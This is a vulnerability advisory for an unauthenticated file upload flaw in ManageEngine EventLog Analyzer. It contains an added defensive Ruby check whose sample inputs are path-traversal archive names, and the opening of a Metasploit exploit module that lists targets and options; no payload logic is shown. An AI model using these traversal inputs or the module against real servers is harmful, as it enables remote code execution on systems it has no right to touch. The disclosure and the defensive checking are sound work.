Release date: 2014-08-31
Updated: 2014-09-03
Affected systems:
ManageEngine EventLog Analyzer 9.9 Build 9002
Description:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 69482
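ManageEngine EventLog Analyzer is IT compliance and event log management software.
EventLog Analyzer 9.9 Build 9002 and other versions contain an arbitrary file upload vulnerability and an unauthorized access vulnerability in their implementation. An attacker can exploit these vulnerabilities to execute arbitrary code and to access the application without authorization.
<*Source: h0ng10
   *>
Test method: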
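The module description further down this page attributes the upload flaw to insecure handling of zip file contents. As an added example (not code from the advisory, the module or ManageEngine), the Ruby below shows a server-side check against one common form of that weakness: archive entry names that resolve outside the extraction directory. That form is an assumption here, since the page does not spell it out, and the directory and entry names are constructed.

```ruby
# Added example: reject archive entry names that would be written outside
# the extraction directory. Not code from the advisory or the product.

# Returns the absolute path an entry may be written to, or nil to reject it.
def safe_target(dest_dir, entry_name)
  return nil if entry_name.nil? || entry_name.empty? || entry_name.include?("\0")
  name = entry_name.gsub('\\', '/')              # Windows separators count too
  return nil if name.start_with?('/')            # absolute POSIX path
  return nil if name.match?(/\A[A-Za-z]:/)       # drive-qualified Windows path
  base   = File.expand_path(dest_dir)
  target = File.expand_path(File.join(base, name)) # collapses "." and ".." lexically
  # The trailing separator stops a sibling such as "<base>-evil" from matching.
  target.start_with?(base + File::SEPARATOR) ? target : nil
end

# Splits names into [accepted_targets, rejected_names]. An upload handler
# should refuse the whole archive when the second list is not empty.
def audit_entries(dest_dir, names)
  accepted = []
  rejected = []
  names.each do |n|
    t = safe_target(dest_dir, n)
    t ? accepted << t : rejected << n
  end
  [accepted, rejected]
end

# Constructed sample values (hypothetical directory and entry names).
DEST_DIR = '/srv/uploads/agent'
SAMPLE_ENTRIES = [
  'logs/agent1.log',
  'a/../b.txt',
  '../../outside.txt',
  'logs\\..\\..\\outside.txt',
  '/tmp/abs.txt',
  'C:\\temp\\x.txt',
  '../agent-evil/x.txt'
].freeze

if __FILE__ == $PROGRAM_NAME
  ok, bad = audit_entries(DEST_DIR, SAMPLE_ENTRIES)
  puts "accepted: #{ok.inspect}"
  puts "rejected: #{bad.inspect}"
end
```

The check is lexical only, so an extractor should also refuse symlink entries and write each file to the resolved path it validated.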
--------------------------------------------------------------------------------
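WARNING
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!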
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'ManageEngine Eventlog Analyzer Arbitrary File Upload',
      'Description' => %q{
        This module exploits a file upload vulnerability in ManageEngine Eventlog Analyzer.
        The vulnerability exists in the agentUpload servlet which accepts unauthenticated
        file uploads and handles zip file contents in a insecure way. By combining both
        weaknesses a remote attacker can achieve remote code execution. This module has been
        tested successfully on versions v7.0 - v9.9 b9002 in Windows and Linux. Versions
        between 7.0 and < 8.1 are only exploitable via EAR deployment in the JBoss server,
        while versions 8.1+ are only exploitable via a JSP upload.
      },
      'Author'       =>
        [
          'h0ng10',
          'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          [ 'URL', 'https://www.mogwaisecurity.de/advisories/MSA-2014-01.txt' ],
          [ 'URL', 'http://seclists.org/fulldisclosure/2014/Aug/86' ]
        ],
      'DefaultOptions' => { 'WfsDelay' => 5 },
      'Privileged'  => false,            # Privileged on Windows but not on Linux targets
      'Platform'    => %w{ java linux win },
      'Targets'     =>
        [
          [ 'Automatic', { } ],
          [ 'Eventlog Analyzer v7.0 - v8.0 / Java universal',
            {
              'Platform' => 'java',
              'Arch' => ARCH_JAVA,
              'WfsDelay' => 30
            }
          ],
          [ 'Eventlog Analyzer v8.1 - v9.9 b9002 / Windows',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86
            }
          ],
          [ 'Eventlog Analyzer v8.1 - v9.9 b9002 / Linux',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Aug 31 2014'))

    register_options(
      [
        Opt::RPORT(8400),
        OptInt.new('SLEEP',
          [true, 'Seconds to sleep while we wait for EAR deployment (Java target only)', 15]),
      ], self.class)
  end
